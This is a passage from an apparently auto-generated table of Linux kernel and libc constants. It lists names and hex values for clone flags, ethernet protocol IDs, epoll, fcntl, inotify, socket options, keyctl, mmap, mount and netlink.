CLOCK_REALTIME_ALARM = 0x8
CLOCK_REALTIME_COARSE = 0x5
CLOCK_TAI = 0xb
CLOCK_THREAD_CPUTIME_ID = 0x3
CLOCK_TXFROMRX = 0x4
CLOCK_TXINT = 0x3
CLONE_CHILD_CLEARTID = 0x200000
CLONE_CHILD_SETTID = 0x1000000
CLONE_DETACHED = 0x400000
CLONE_FILES = 0x400
CLONE_FS = 0x200
CLONE_IO = 0x80000000
CLONE_NEWCGROUP = 0x2000000
CLONE_NEWIPC = 0x8000000
CLONE_NEWNET = 0x40000000
CLONE_NEWNS = 0x20000
CLONE_NEWPID = 0x20000000
CLONE_NEWUSER = 0x10000000
CLONE_NEWUTS = 0x4000000
CLONE_PARENT = 0x8000
CLONE_PARENT_SETTID = 0x100000
CLONE_PTRACE = 0x2000
CLONE_SETTLS = 0x80000
CLONE_SIGHAND = 0x800
CLONE_SYSVSEM = 0x40000
CLONE_THREAD = 0x10000
CLONE_UNTRACED = 0x800000
CLONE_VFORK = 0x4000
CLONE_VM = 0x100
CMSPAR = 0x40000000
CR0 = 0x0
CR1 = 0x200
CR2 = 0x400
CR3 = 0x600
CRDLY = 0x600
CREAD = 0x80
CRTSCTS = 0x80000000
CS5 = 0x0
CS6 = 0x10
CS7 = 0x20
CS8 = 0x30
CSIGNAL = 0xff
CSIZE = 0x30
CSTART = 0x11
CSTATUS = 0x0
CSTOP = 0x13
CSTOPB = 0x40
CSUSP = 0x1a
DT_BLK = 0x6
DT_CHR = 0x2
DT_DIR = 0x4
DT_FIFO = 0x1
DT_LNK = 0xa
DT_REG = 0x8
DT_SOCK = 0xc
DT_UNKNOWN = 0x0
DT_WHT = 0xe
ECHO = 0x8
ECHOCTL = 0x200
ECHOE = 0x10
ECHOK = 0x20
ECHOKE = 0x800
ECHONL = 0x40
ECHOPRT = 0x400
EFD_CLOEXEC = 0x80000
EFD_NONBLOCK = 0x800
EFD_SEMAPHORE = 0x1
ENCODING_DEFAULT = 0x0
ENCODING_FM_MARK = 0x3
ENCODING_FM_SPACE = 0x4
ENCODING_MANCHESTER = 0x5
ENCODING_NRZ = 0x1
ENCODING_NRZI = 0x2
EPOLLERR = 0x8
EPOLLET = 0x80000000
EPOLLEXCLUSIVE = 0x10000000
EPOLLHUP = 0x10
EPOLLIN = 0x1
EPOLLMSG = 0x400
EPOLLONESHOT = 0x40000000
EPOLLOUT = 0x4
EPOLLPRI = 0x2
EPOLLRDBAND = 0x80
EPOLLRDHUP = 0x2000
EPOLLRDNORM = 0x40
EPOLLWAKEUP = 0x20000000
EPOLLWRBAND = 0x200
EPOLLWRNORM = 0x100
EPOLL_CLOEXEC = 0x80000
EPOLL_CTL_ADD = 0x1
EPOLL_CTL_DEL = 0x2
EPOLL_CTL_MOD = 0x3
ETH_P_1588 = 0x88f7
ETH_P_8021AD = 0x88a8
ETH_P_8021AH = 0x88e7
ETH_P_8021Q = 0x8100
ETH_P_80221 = 0x8917
ETH_P_802_2 = 0x4
ETH_P_802_3 = 0x1
ETH_P_802_3_MIN = 0x600
ETH_P_802_EX1 = 0x88b5
ETH_P_AARP = 0x80f3
ETH_P_AF_IUCV = 0xfbfb
ETH_P_ALL = 0x3
ETH_P_AOE = 0x88a2
ETH_P_ARCNET = 0x1a
ETH_P_ARP = 0x806
ETH_P_ATALK = 0x809b
ETH_P_ATMFATE = 0x8884
ETH_P_ATMMPOA = 0x884c
ETH_P_AX25 = 0x2
ETH_P_BATMAN = 0x4305
ETH_P_BPQ = 0x8ff
ETH_P_CAIF = 0xf7
ETH_P_CAN = 0xc
ETH_P_CANFD = 0xd
ETH_P_CONTROL = 0x16
ETH_P_CUST = 0x6006
ETH_P_DDCMP = 0x6
ETH_P_DEC = 0x6000
ETH_P_DIAG = 0x6005
ETH_P_DNA_DL = 0x6001
ETH_P_DNA_RC = 0x6002
ETH_P_DNA_RT = 0x6003
ETH_P_DSA = 0x1b
ETH_P_ECONET = 0x18
ETH_P_EDSA = 0xdada
ETH_P_FCOE = 0x8906
ETH_P_FIP = 0x8914
ETH_P_HDLC = 0x19
ETH_P_HSR = 0x892f
ETH_P_IBOE = 0x8915
ETH_P_IEEE802154 = 0xf6
ETH_P_IEEEPUP = 0xa00
ETH_P_IEEEPUPAT = 0xa01
ETH_P_IP = 0x800
ETH_P_IPV6 = 0x86dd
ETH_P_IPX = 0x8137
ETH_P_IRDA = 0x17
ETH_P_LAT = 0x6004
ETH_P_LINK_CTL = 0x886c
ETH_P_LOCALTALK = 0x9
ETH_P_LOOP = 0x60
ETH_P_LOOPBACK = 0x9000
ETH_P_MACSEC = 0x88e5
ETH_P_MOBITEX = 0x15
ETH_P_MPLS_MC = 0x8848
ETH_P_MPLS_UC = 0x8847
ETH_P_MVRP = 0x88f5
ETH_P_NCSI = 0x88f8
ETH_P_PAE = 0x888e
ETH_P_PAUSE = 0x8808
ETH_P_PHONET = 0xf5
ETH_P_PPPTALK = 0x10
ETH_P_PPP_DISC = 0x8863
ETH_P_PPP_MP = 0x8
ETH_P_PPP_SES = 0x8864
ETH_P_PRP = 0x88fb
ETH_P_PUP = 0x200
ETH_P_PUPAT = 0x201
ETH_P_QINQ1 = 0x9100
ETH_P_QINQ2 = 0x9200
ETH_P_QINQ3 = 0x9300
ETH_P_RARP = 0x8035
ETH_P_SCA = 0x6007
ETH_P_SLOW = 0x8809
ETH_P_SNAP = 0x5
ETH_P_TDLS = 0x890d
ETH_P_TEB = 0x6558
ETH_P_TIPC = 0x88ca
ETH_P_TRAILER = 0x1c
ETH_P_TR_802_2 = 0x11
ETH_P_TSN = 0x22f0
ETH_P_WAN_PPP = 0x7
ETH_P_WCCP = 0x883e
ETH_P_X25 = 0x805
ETH_P_XDSA = 0xf8
EXTA = 0xe
EXTB = 0xf
EXTPROC = 0x10000
FALLOC_FL_COLLAPSE_RANGE = 0x8
FALLOC_FL_INSERT_RANGE = 0x20
FALLOC_FL_KEEP_SIZE = 0x1
FALLOC_FL_NO_HIDE_STALE = 0x4
FALLOC_FL_PUNCH_HOLE = 0x2
FALLOC_FL_UNSHARE_RANGE = 0x40
FALLOC_FL_ZERO_RANGE = 0x10
FD_CLOEXEC = 0x1
FD_SETSIZE = 0x400
FF0 = 0x0
FF1 = 0x8000
FFDLY = 0x8000
FLUSHO = 0x1000
FS_ENCRYPTION_MODE_AES_128_CBC = 0x5
FS_ENCRYPTION_MODE_AES_128_CTS = 0x6
FS_ENCRYPTION_MODE_AES_256_CBC = 0x3
FS_ENCRYPTION_MODE_AES_256_CTS = 0x4
FS_ENCRYPTION_MODE_AES_256_GCM = 0x2
FS_ENCRYPTION_MODE_AES_256_XTS = 0x1
FS_ENCRYPTION_MODE_INVALID = 0x0
FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615
FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614
FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613
FS_KEY_DESCRIPTOR_SIZE = 0x8
FS_KEY_DESC_PREFIX = "fscrypt:"
FS_KEY_DESC_PREFIX_SIZE = 0x8
FS_MAX_KEY_SIZE = 0x40
FS_POLICY_FLAGS_PAD_16 = 0x2
FS_POLICY_FLAGS_PAD_32 = 0x3
FS_POLICY_FLAGS_PAD_4 = 0x0
FS_POLICY_FLAGS_PAD_8 = 0x1
FS_POLICY_FLAGS_PAD_MASK = 0x3
FS_POLICY_FLAGS_VALID = 0x3
F_DUPFD = 0x0
F_DUPFD_CLOEXEC = 0x406
F_EXLCK = 0x4
F_GETFD = 0x1
F_GETFL = 0x3
F_GETLEASE = 0x401
F_GETLK = 0x5
F_GETLK64 = 0x5
F_GETOWN = 0x9
F_GETOWN_EX = 0x10
F_GETPIPE_SZ = 0x408
F_GETSIG = 0xb
F_LOCK = 0x1
F_NOTIFY = 0x402
F_OFD_GETLK = 0x24
F_OFD_SETLK = 0x25
F_OFD_SETLKW = 0x26
F_OK = 0x0
F_RDLCK = 0x0
F_SETFD = 0x2
F_SETFL = 0x4
F_SETLEASE = 0x400
F_SETLK = 0x6
F_SETLK64 = 0x6
F_SETLKW = 0x7
F_SETLKW64 = 0x7
F_SETOWN = 0x8
F_SETOWN_EX = 0xf
F_SETPIPE_SZ = 0x407
F_SETSIG = 0xa
F_SHLCK = 0x8
F_TEST = 0x3
F_TLOCK = 0x2
F_ULOCK = 0x0
F_UNLCK = 0x2
F_WRLCK = 0x1
GENL_ADMIN_PERM = 0x1
GENL_CMD_CAP_DO = 0x2
GENL_CMD_CAP_DUMP = 0x4
GENL_CMD_CAP_HASPOL = 0x8
GENL_HDRLEN = 0x4
GENL_ID_CTRL = 0x10
GENL_ID_PMCRAID = 0x12
GENL_ID_VFS_DQUOT = 0x11
GENL_MAX_ID = 0x3ff
GENL_MIN_ID = 0x10
GENL_NAMSIZ = 0x10
GENL_START_ALLOC = 0x13
GENL_UNS_ADMIN_PERM = 0x10
GRND_NONBLOCK = 0x1
GRND_RANDOM = 0x2
HUPCL = 0x400
IBSHIFT = 0x10
ICANON = 0x2
ICMPV6_FILTER = 0x1
ICRNL = 0x100
IEXTEN = 0x8000
IFA_F_DADFAILED = 0x8
IFA_F_DEPRECATED = 0x20
IFA_F_HOMEADDRESS = 0x10
IFA_F_MANAGETEMPADDR = 0x100
IFA_F_MCAUTOJOIN = 0x400
IFA_F_NODAD = 0x2
IFA_F_NOPREFIXROUTE = 0x200
IFA_F_OPTIMISTIC = 0x4
IFA_F_PERMANENT = 0x80
IFA_F_SECONDARY = 0x1
IFA_F_STABLE_PRIVACY = 0x800
IFA_F_TEMPORARY = 0x1
IFA_F_TENTATIVE = 0x40
IFA_MAX = 0x8
IFF_ALLMULTI = 0x200
IFF_ATTACH_QUEUE = 0x200
IFF_AUTOMEDIA = 0x4000
IFF_BROADCAST = 0x2
IFF_DEBUG = 0x4
IFF_DETACH_QUEUE = 0x400
IFF_DORMANT = 0x20000
IFF_DYNAMIC = 0x8000
IFF_ECHO = 0x40000
IFF_LOOPBACK = 0x8
IFF_LOWER_UP = 0x10000
IFF_MASTER = 0x400
IFF_MULTICAST = 0x1000
IFF_MULTI_QUEUE = 0x100
IFF_NOARP = 0x80
IFF_NOFILTER = 0x1000
IFF_NOTRAILERS = 0x20
IFF_NO_PI = 0x1000
IFF_ONE_QUEUE = 0x2000
IFF_PERSIST = 0x800
IFF_POINTOPOINT = 0x10
IFF_PORTSEL = 0x2000
IFF_PROMISC = 0x100
IFF_RUNNING = 0x40
IFF_SLAVE = 0x800
IFF_TAP = 0x2
IFF_TUN = 0x1
IFF_TUN_EXCL = 0x8000
IFF_UP = 0x1
IFF_VNET_HDR = 0x4000
IFF_VOLATILE = 0x70c5a
IFNAMSIZ = 0x10
IGNBRK = 0x1
IGNCR = 0x80
IGNPAR = 0x4
IMAXBEL = 0x2000
INLCR = 0x40
INPCK = 0x10
IN_ACCESS = 0x1
IN_ALL_EVENTS = 0xfff
IN_ATTRIB = 0x4
IN_CLASSA_HOST = 0xffffff
IN_CLASSA_MAX = 0x80
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 0x18
IN_CLASSB_HOST = 0xffff
IN_CLASSB_MAX = 0x10000
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 0x10
IN_CLASSC_HOST = 0xff
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 0x8
IN_CLOEXEC = 0x80000
IN_CLOSE = 0x18
IN_CLOSE_NOWRITE = 0x10
IN_CLOSE_WRITE = 0x8
IN_CREATE = 0x100
IN_DELETE = 0x200
IN_DELETE_SELF = 0x400
IN_DONT_FOLLOW = 0x2000000
IN_EXCL_UNLINK = 0x4000000
IN_IGNORED = 0x8000
IN_ISDIR = 0x40000000
IN_LOOPBACKNET = 0x7f
IN_MASK_ADD = 0x20000000
IN_MODIFY = 0x2
IN_MOVE = 0xc0
IN_MOVED_FROM = 0x40
IN_MOVED_TO = 0x80
IN_MOVE_SELF = 0x800
IN_NONBLOCK = 0x800
IN_ONESHOT = 0x80000000
IN_ONLYDIR = 0x1000000
IN_OPEN = 0x20
IN_Q_OVERFLOW = 0x4000
IN_UNMOUNT = 0x2000
IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9
IPPROTO_AH = 0x33
IPPROTO_BEETPH = 0x5e
IPPROTO_COMP = 0x6c
IPPROTO_DCCP = 0x21
IPPROTO_DSTOPTS = 0x3c
IPPROTO_EGP = 0x8
IPPROTO_ENCAP = 0x62
IPPROTO_ESP = 0x32
IPPROTO_FRAGMENT = 0x2c
IPPROTO_GRE = 0x2f
IPPROTO_HOPOPTS = 0x0
IPPROTO_ICMP = 0x1
IPPROTO_ICMPV6 = 0x3a
IPPROTO_IDP = 0x16
IPPROTO_IGMP = 0x2
IPPROTO_IP = 0x0
IPPROTO_IPIP = 0x4
IPPROTO_IPV6 = 0x29
IPPROTO_MH = 0x87
IPPROTO_MPLS = 0x89
IPPROTO_MTP = 0x5c
IPPROTO_NONE = 0x3b
IPPROTO_PIM = 0x67
IPPROTO_PUP = 0xc
IPPROTO_RAW = 0xff
IPPROTO_ROUTING = 0x2b
IPPROTO_RSVP = 0x2e
IPPROTO_SCTP = 0x84
IPPROTO_TCP = 0x6
IPPROTO_TP = 0x1d
IPPROTO_UDP = 0x11
IPPROTO_UDPLITE = 0x88
IPV6_2292DSTOPTS = 0x4
IPV6_2292HOPLIMIT = 0x8
IPV6_2292HOPOPTS = 0x3
IPV6_2292PKTINFO = 0x2
IPV6_2292PKTOPTIONS = 0x6
IPV6_2292RTHDR = 0x5
IPV6_ADDRFORM = 0x1
IPV6_ADDR_PREFERENCES = 0x48
IPV6_ADD_MEMBERSHIP = 0x14
IPV6_AUTHHDR = 0xa
IPV6_AUTOFLOWLABEL = 0x46
IPV6_CHECKSUM = 0x7
IPV6_DONTFRAG = 0x3e
IPV6_DROP_MEMBERSHIP = 0x15
IPV6_DSTOPTS = 0x3b
IPV6_HDRINCL = 0x24
IPV6_HOPLIMIT = 0x34
IPV6_HOPOPTS = 0x36
IPV6_IPSEC_POLICY = 0x22
IPV6_JOIN_ANYCAST = 0x1b
IPV6_JOIN_GROUP = 0x14
IPV6_LEAVE_ANYCAST = 0x1c
IPV6_LEAVE_GROUP = 0x15
IPV6_MINHOPCOUNT = 0x49
IPV6_MTU = 0x18
IPV6_MTU_DISCOVER = 0x17
IPV6_MULTICAST_HOPS = 0x12
IPV6_MULTICAST_IF = 0x11
IPV6_MULTICAST_LOOP = 0x13
IPV6_NEXTHOP = 0x9
IPV6_ORIGDSTADDR = 0x4a
IPV6_PATHMTU = 0x3d
IPV6_PKTINFO = 0x32
IPV6_PMTUDISC_DO = 0x2
IPV6_PMTUDISC_DONT = 0x0
IPV6_PMTUDISC_INTERFACE = 0x4
IPV6_PMTUDISC_OMIT = 0x5
IPV6_PMTUDISC_PROBE = 0x3
IPV6_PMTUDISC_WANT = 0x1
IPV6_RECVDSTOPTS = 0x3a
IPV6_RECVERR = 0x19
IPV6_RECVFRAGSIZE = 0x4d
IPV6_RECVHOPLIMIT = 0x33
IPV6_RECVHOPOPTS = 0x35
IPV6_RECVORIGDSTADDR = 0x4a
IPV6_RECVPATHMTU = 0x3c
IPV6_RECVPKTINFO = 0x31
IPV6_RECVRTHDR = 0x38
IPV6_RECVTCLASS = 0x42
IPV6_ROUTER_ALERT = 0x16
IPV6_RTHDR = 0x39
IPV6_RTHDRDSTOPTS = 0x37
IPV6_RTHDR_LOOSE = 0x0
IPV6_RTHDR_STRICT = 0x1
IPV6_RTHDR_TYPE_0 = 0x0
IPV6_RXDSTOPTS = 0x3b
IPV6_RXHOPOPTS = 0x36
IPV6_TCLASS = 0x43
IPV6_TRANSPARENT = 0x4b
IPV6_UNICAST_HOPS = 0x10
IPV6_UNICAST_IF = 0x4c
IPV6_V6ONLY = 0x1a
IPV6_XFRM_POLICY = 0x23
IP_ADD_MEMBERSHIP = 0x23
IP_ADD_SOURCE_MEMBERSHIP = 0x27
IP_BIND_ADDRESS_NO_PORT = 0x18
IP_BLOCK_SOURCE = 0x26
IP_CHECKSUM = 0x17
IP_DEFAULT_MULTICAST_LOOP = 0x1
IP_DEFAULT_MULTICAST_TTL = 0x1
IP_DF = 0x4000
IP_DROP_MEMBERSHIP = 0x24
IP_DROP_SOURCE_MEMBERSHIP = 0x28
IP_FREEBIND = 0xf
IP_HDRINCL = 0x3
IP_IPSEC_POLICY = 0x10
IP_MAXPACKET = 0xffff
IP_MAX_MEMBERSHIPS = 0x14
IP_MF = 0x2000
IP_MINTTL = 0x15
IP_MSFILTER = 0x29
IP_MSS = 0x240
IP_MTU = 0xe
IP_MTU_DISCOVER = 0xa
IP_MULTICAST_ALL = 0x31
IP_MULTICAST_IF = 0x20
IP_MULTICAST_LOOP = 0x22
IP_MULTICAST_TTL = 0x21
IP_NODEFRAG = 0x16
IP_OFFMASK = 0x1fff
IP_OPTIONS = 0x4
IP_ORIGDSTADDR = 0x14
IP_PASSSEC = 0x12
IP_PKTINFO = 0x8
IP_PKTOPTIONS = 0x9
IP_PMTUDISC = 0xa
IP_PMTUDISC_DO = 0x2
IP_PMTUDISC_DONT = 0x0
IP_PMTUDISC_INTERFACE = 0x4
IP_PMTUDISC_OMIT = 0x5
IP_PMTUDISC_PROBE = 0x3
IP_PMTUDISC_WANT = 0x1
IP_RECVERR = 0xb
IP_RECVFRAGSIZE = 0x19
IP_RECVOPTS = 0x6
IP_RECVORIGDSTADDR = 0x14
IP_RECVRETOPTS = 0x7
IP_RECVTOS = 0xd
IP_RECVTTL = 0xc
IP_RETOPTS = 0x7
IP_RF = 0x8000
IP_ROUTER_ALERT = 0x5
IP_TOS = 0x1
IP_TRANSPARENT = 0x13
IP_TTL = 0x2
IP_UNBLOCK_SOURCE = 0x25
IP_UNICAST_IF = 0x32
IP_XFRM_POLICY = 0x11
ISIG = 0x1
ISTRIP = 0x20
IUCLC = 0x200
IUTF8 = 0x4000
IXANY = 0x800
IXOFF = 0x1000
IXON = 0x400
KEYCTL_ASSUME_AUTHORITY = 0x10
KEYCTL_CHOWN = 0x4
KEYCTL_CLEAR = 0x7
KEYCTL_DESCRIBE = 0x6
KEYCTL_DH_COMPUTE = 0x17
KEYCTL_GET_KEYRING_ID = 0x0
KEYCTL_GET_PERSISTENT = 0x16
KEYCTL_GET_SECURITY = 0x11
KEYCTL_INSTANTIATE = 0xc
KEYCTL_INSTANTIATE_IOV = 0x14
KEYCTL_INVALIDATE = 0x15
KEYCTL_JOIN_SESSION_KEYRING = 0x1
KEYCTL_LINK = 0x8
KEYCTL_NEGATE = 0xd
KEYCTL_READ = 0xb
KEYCTL_REJECT = 0x13
KEYCTL_RESTRICT_KEYRING = 0x1d
KEYCTL_REVOKE = 0x3
KEYCTL_SEARCH = 0xa
KEYCTL_SESSION_TO_PARENT = 0x12
KEYCTL_SETPERM = 0x5
KEYCTL_SET_REQKEY_KEYRING = 0xe
KEYCTL_SET_TIMEOUT = 0xf
KEYCTL_UNLINK = 0x9
KEYCTL_UPDATE = 0x2
KEY_REQKEY_DEFL_DEFAULT = 0x0
KEY_REQKEY_DEFL_GROUP_KEYRING = 0x6
KEY_REQKEY_DEFL_NO_CHANGE = -0x1
KEY_REQKEY_DEFL_PROCESS_KEYRING = 0x2
KEY_REQKEY_DEFL_REQUESTOR_KEYRING = 0x7
KEY_REQKEY_DEFL_SESSION_KEYRING = 0x3
KEY_REQKEY_DEFL_THREAD_KEYRING = 0x1
KEY_REQKEY_DEFL_USER_KEYRING = 0x4
KEY_REQKEY_DEFL_USER_SESSION_KEYRING = 0x5
KEY_SPEC_GROUP_KEYRING = -0x6
KEY_SPEC_PROCESS_KEYRING = -0x2
KEY_SPEC_REQKEY_AUTH_KEY = -0x7
KEY_SPEC_REQUESTOR_KEYRING = -0x8
KEY_SPEC_SESSION_KEYRING = -0x3
KEY_SPEC_THREAD_KEYRING = -0x1
KEY_SPEC_USER_KEYRING = -0x4
KEY_SPEC_USER_SESSION_KEYRING = -0x5
LINUX_REBOOT_CMD_CAD_OFF = 0x0
LINUX_REBOOT_CMD_CAD_ON = 0x89abcdef
LINUX_REBOOT_CMD_HALT = 0xcdef0123
LINUX_REBOOT_CMD_KEXEC = 0x45584543
LINUX_REBOOT_CMD_POWER_OFF = 0x4321fedc
LINUX_REBOOT_CMD_RESTART = 0x1234567
LINUX_REBOOT_CMD_RESTART2 = 0xa1b2c3d4
LINUX_REBOOT_CMD_SW_SUSPEND = 0xd000fce2
LINUX_REBOOT_MAGIC1 = 0xfee1dead
LINUX_REBOOT_MAGIC2 = 0x28121969
LOCK_EX = 0x2
LOCK_NB = 0x4
LOCK_SH = 0x1
LOCK_UN = 0x8
MADV_DODUMP = 0x11
MADV_DOFORK = 0xb
MADV_DONTDUMP = 0x10
MADV_DONTFORK = 0xa
MADV_DONTNEED = 0x4
MADV_FREE = 0x8
MADV_HUGEPAGE = 0xe
MADV_HWPOISON = 0x64
MADV_MERGEABLE = 0xc
MADV_NOHUGEPAGE = 0xf
MADV_NORMAL = 0x0
MADV_RANDOM = 0x1
MADV_REMOVE = 0x9
MADV_SEQUENTIAL = 0x2
MADV_UNMERGEABLE = 0xd
MADV_WILLNEED = 0x3
MAP_32BIT = 0x40
MAP_ANON = 0x20
MAP_ANONYMOUS = 0x20
MAP_DENYWRITE = 0x800
MAP_EXECUTABLE = 0x1000
MAP_FILE = 0x0
MAP_FIXED = 0x10
MAP_GROWSDOWN = 0x100
MAP_HUGETLB = 0x40000
MAP_HUGE_MASK = 0x3f
MAP_HUGE_SHIFT = 0x1a
MAP_LOCKED = 0x2000
MAP_NONBLOCK = 0x10000
MAP_NORESERVE = 0x4000
MAP_POPULATE = 0x8000
MAP_PRIVATE = 0x2
MAP_SHARED = 0x1
MAP_STACK = 0x20000
MAP_TYPE = 0xf
MCL_CURRENT = 0x1
MCL_FUTURE = 0x2
MCL_ONFAULT = 0x4
MNT_DETACH = 0x2
MNT_EXPIRE = 0x4
MNT_FORCE = 0x1
MSG_BATCH = 0x40000
MSG_CMSG_CLOEXEC = 0x40000000
MSG_CONFIRM = 0x800
MSG_CTRUNC = 0x8
MSG_DONTROUTE = 0x4
MSG_DONTWAIT = 0x40
MSG_EOR = 0x80
MSG_ERRQUEUE = 0x2000
MSG_FASTOPEN = 0x20000000
MSG_FIN = 0x200
MSG_MORE = 0x8000
MSG_NOSIGNAL = 0x4000
MSG_OOB = 0x1
MSG_PEEK = 0x2
MSG_PROXY = 0x10
MSG_RST = 0x1000
MSG_SYN = 0x400
MSG_TRUNC = 0x20
MSG_TRYHARD = 0x4
MSG_WAITALL = 0x100
MSG_WAITFORONE = 0x10000
MS_ACTIVE = 0x40000000
MS_ASYNC = 0x1
MS_BIND = 0x1000
MS_BORN = 0x20000000
MS_DIRSYNC = 0x80
MS_INVALIDATE = 0x2
MS_I_VERSION = 0x800000
MS_KERNMOUNT = 0x400000
MS_LAZYTIME = 0x2000000
MS_MANDLOCK = 0x40
MS_MGC_MSK = 0xffff0000
MS_MGC_VAL = 0xc0ed0000
MS_MOVE = 0x2000
MS_NOATIME = 0x400
MS_NODEV = 0x4
MS_NODIRATIME = 0x800
MS_NOEXEC = 0x8
MS_NOREMOTELOCK = 0x8000000
MS_NOSEC = 0x10000000
MS_NOSUID = 0x2
MS_NOUSER = -0x80000000
MS_POSIXACL = 0x10000
MS_PRIVATE = 0x40000
MS_RDONLY = 0x1
MS_REC = 0x4000
MS_RELATIME = 0x200000
MS_REMOUNT = 0x20
MS_RMT_MASK = 0x2800051
MS_SHARED = 0x100000
MS_SILENT = 0x8000
MS_SLAVE = 0x80000
MS_STRICTATIME = 0x1000000
MS_SUBMOUNT = 0x4000000
MS_SYNC = 0x4
MS_SYNCHRONOUS = 0x10
MS_UNBINDABLE = 0x20000
MS_VERBOSE = 0x8000
NAME_MAX = 0xff
NETLINK_ADD_MEMBERSHIP = 0x1
NETLINK_AUDIT = 0x9
NETLINK_BROADCAST_ERROR = 0x4
NETLINK_CAP_ACK = 0xa
NETLINK_CONNECTOR = 0xb
NETLINK_CRYPTO = 0x15
NETLINK_DNRTMSG = 0xe
NETLINK_DROP_MEMBERSHIP = 0x2
NETLINK_ECRYPTFS = 0x13
NETLINK_EXT_ACK = 0xb
NETLINK_FIB_LOOKUP = 0xa
NETLINK_FIREWALL = 0x3
NETLINK_GENERIC = 0x10
NETLINK_INET_DIAG = 0x4
NETLINK_IP6_FW = 0xd
NETLINK_ISCSI = 0x8
NETLINK_KOBJECT_UEVENT = 0xf
NETLINK_LISTEN_ALL_NSID = 0x8
NETLINK_LIST_MEMBERSHIPS = 0x9
NETLINK_NETFILTER = 0xc
NETLINK_NFLOG = 0x5
NETLINK_NO_ENOBUFS = 0x5
NETLINK_PKTINFO = 0x3
NETLINK_RDMA = 0x14
NETLINK_ROUTE = 0x0
NETLINK_RX_RING = 0x6
NETLINK_SCSITRANSPORT = 0x12
NETLINK_SELINUX = 0x7
NETLINK_SMC = 0x16
NETLINK_SOCK_DIAG = 0x4
NETLINK_TX_RING = 0x7
NETLINK_UNUSED = 0x1
NETLINK_USERSOCK = 0x2
NETLINK_XFRM = 0x6
NL0 = 0x0
NL1 = 0x100
NLA_ALIGNTO = 0x4
NLA_F_NESTED = 0x8000
NLA_F_NET_BYTEORDER = 0x4000
NLA_HDRLEN = 0x4
NLDLY = 0x100
NLMSG_ALIGNTO = 0x4
NLMSG_DONE = 0x3
NLMSG_ERROR = 0x2
NLMSG_HDRLEN = 0x10
NLMSG_MIN_TYPE = 0x10
NLMSG_NOOP = 0x1
NLMSG_OVERRUN = 0x4
NLM_F_ACK = 0x4
NLM_F_ACK_TLVS = 0x200
NLM_F_APPEND = 0x800
NLM_F_ATOMIC = 0x400
NLM_F_CAPPED = 0x100
NLM_F_CREATE = 0x400
NLM_F_DUMP = 0x300
NLM_F_DUMP_FILTERED = 0x20
NLM_F_DUMP_INTR = 0x10
NLM_F_ECHO = 0x8
NLM_F_EXCL = 0x200
NLM_F_MATCH = 0x200
NLM_F_MULTI = 0x2
NLM_F_REPLACE = 0x100
NLM_F_REQUEST = 0x1
NLM_F_ROOT = 0x100
NOFLSH = 0x80
OCRNL = 0x8
OFDEL = 0x80
OFILL = 0x40
OLCUC = 0x2
ONLCR = 0x4
ONLRET = 0x20
ONOCR = 0x10
OPOST = 0x1
O_ACCMODE = 0x3
O_APPEND = 0x400
O_ASYNC = 0x2000
O_CLOEXEC = 0x80000
O_CREAT = 0x40
O_DIRECT = 0x4000
O_DIRECTORY = 0x10000
O_DSYNC = 0x1000
O_EXCL = 0x80
O_FSYNC = 0x101000
O_LARGEFILE = 0x0
O_NDELAY = 0x800
O_NOATIME = 0x40000
O_NOCTTY = 0x100
O_NOFOLLOW = 0x20000
O_NONBLOCK = 0x800
O_PATH = 0x200000
O_RDONLY = 0x0
O_RDWR = 0x2
O_RSYNC = 0x101000
O_SYNC = 0x101000
O_TMPFILE = 0x410000
O_TRUNC = 0x200
O_WRONLY = 0x1
PACKET_ADD_MEMBERSHIP = 0x1
PACKET_AUXDATA = 0x8
PACKET_BROADCAST = 0x1
PACKET_COPY_THRESH = 0x7
PACKET_DROP_MEMBERSHIP = 0x2
PACKET_FANOUT = 0x12
PACKET_FANOUT_CBPF = 0x6
PACKET_FANOUT_CPU = 0x2
PACKET_FANOUT_DATA = 0x16
PACKET_FANOUT_EBPF = 0x7
PACKET_FANOUT_FLAG_DEFRAG = 0x8000
PACKET_FANOUT_FLAG_ROLLOVER = 0x1000
PACKET_FANOUT_FLAG_UNIQUEID = 0x2000
PACKET_FANOUT_HASH = 0x0
PACKET_FANOUT_LB = 0x1
PACKET_FANOUT_QM = 0x5
PACKET_FANOUT_RND = 0x4
PACKET_FANOUT_ROLLOVER = 0x3
PACKET_FASTROUTE = 0x6
PACKET_HDRLEN = 0xb
PACKET_HOST = 0x0
PACKET_KERNEL = 0x7
PACKET_LOOPBACK = 0x5
PACKET_LOSS = 0xe
PACKET_MR_ALLMULTI = 0x2
PACKET_MR_MULTICAST = 0x0
PACKET_MR_PROMISC = 0x1
PACKET_MR_UNICAST = 0x3
PACKET_MULTICAST = 0x2
PACKET_ORIGDEV = 0x9
PACKET_OTHERHOST = 0x3
PACKET_OUTGOING = 0x4
PACKET_QDISC_BYPASS = 0x14
PACKET_RECV_OUTPUT = 0x3
PACKET_RESERVE = 0xc
PACKET_ROLLOVER_STATS = 0x15
PACKET_RX_RING = 0x5
PACKET_STATISTICS = 0x6
PACKET_TIMESTAMP = 0x11
PACKET_TX_HAS_OFF = 0x13
PACKET_TX_RING = 0xd
PACKET_TX_TIMESTAMP = 0x10
PACKET_USER = 0x6
PACKET_VERSION = 0xa
PACKET_VNET_HDR = 0xf
PARENB = 0x100
PARITY_CRC16_PR0 = 0x2
PARITY_CRC16_PR0_CCITT = 0x4
PARITY_CRC16_PR1 = 0x3
PARITY_CRC16_PR1_CCITT = 0x5
PARITY_CRC32_PR0_CCITT = 0x6
PARITY_CRC32_PR1_CCITT = 0x7
PARITY_DEFAULT = 0x0
PARITY_NONE = 0x1
PARMRK = 0x8
PARODD = 0x200
PENDIN = 0x4000
PERF_EVENT_IOC_DISABLE = 0x2401
PERF_EVENT_IOC_ENABLE = 0x2400
PERF_EVENT_IOC_ID = 0x80082407
PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409
PERF_EVENT_IOC_PERIOD = 0x40082404
PERF_EVENT_IOC_REFRESH = 0x2402
PERF_EVENT_IOC_RESET = 0x2403
PERF_EVENT_IOC_SET_BPF = 0x40042408
PERF_EVENT_IOC_SET_FILTER = 0x40082406
PERF_EVENT_IOC_SET_OUTPUT = 0x2405
PRIO_PGRP = 0x1
PRIO_PROCESS = 0x0
